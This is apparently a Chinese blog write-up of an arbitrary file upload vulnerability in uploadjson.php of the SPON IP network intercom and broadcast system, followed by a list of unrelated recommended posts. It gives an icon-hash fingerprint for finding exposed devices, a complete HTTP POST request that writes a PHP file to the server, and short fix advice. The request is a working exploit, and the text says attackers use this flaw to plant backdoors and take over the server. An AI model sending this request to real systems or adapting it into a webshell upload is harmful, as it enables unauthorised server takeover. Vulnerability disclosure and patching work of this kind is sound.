世邦通信 SPON IP网络对讲广播系统uploadjson.php任意文件上传漏洞

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统uploadjson.php存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Content-Length: 61

jsondata[filename]=7788.php&jsondata[data]=<?php echo 'ok';?>

访问上传文件地址

修复建议

1、升级到安全版本

2、如非必要,禁止公网访问该系统。

3、设置白名单访问。

相关推荐
qq_386322691 小时前
华为网路设备学习-25(路由器OSPF - 特性专题 二)
网络·学习·华为
听风lighting1 小时前
WebServer实现:muduo库的主丛Reactor架构
linux·运维·网络·c++·socket·webserver
万岳软件开发小城2 小时前
基于Uniapp+PHP的教育培训系统开发指南:网校源码实战剖析
uni-app·php·软件开发·在线教育系统源码·教育平台搭建·教育app开发·网校小程序
chirrupy_hamal2 小时前
为什么主动关闭 TCP 连接的一方需要 TIME_WAIT 状态?
网络·tcp
Xの哲學2 小时前
hostapd状态机解析
linux·网络·算法·wireless
智驱力人工智能3 小时前
信任再造:跌倒检测算法如何让善意不再“自证”
安全·智慧城市·视觉算法·跌倒检测·行为识别·视觉分析·人员属性识别
Clownseven3 小时前
云计算与5G:如何利用5G网络优化云平台的性能
网络·5g·云计算
独行soc4 小时前
2025年渗透测试面试题总结-2025年HW(护网面试) 01(题目+回答)
linux·科技·安全·面试·职场和发展·区块链
码里看花‌4 小时前
网络编程简介与Netty实战:从入门到高性能Echo服务器
运维·服务器·网络
小毛驴8504 小时前
httpclient实现http连接池
网络·网络协议·http